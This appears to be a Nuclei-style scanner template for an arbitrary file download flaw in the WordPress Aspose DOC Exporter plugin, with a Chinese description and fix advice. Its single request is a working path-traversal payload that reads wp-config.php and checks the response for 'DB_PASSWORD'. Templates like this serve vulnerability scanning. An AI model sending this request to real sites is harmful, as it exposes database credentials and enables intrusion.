id: CNVD-2015-04306
info:
  name: Wordpress_aspose-doc-exporter_Plugin_Arbitrary_File_Download_Vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Aspose DOC Exporter 任意文件下载漏洞
    WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。Aspose DOC Exporter是一个允许管理员导出文章内容的插件。

    WordPress Aspose DOC Exporter插件存在任意文件下载漏洞，允许远程攻击者利用漏洞提交特殊请求，以WEB权限查看系统文件内容。
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/aspose-doc-exporter/

    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"DB_PASSWORD")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
  method: GET
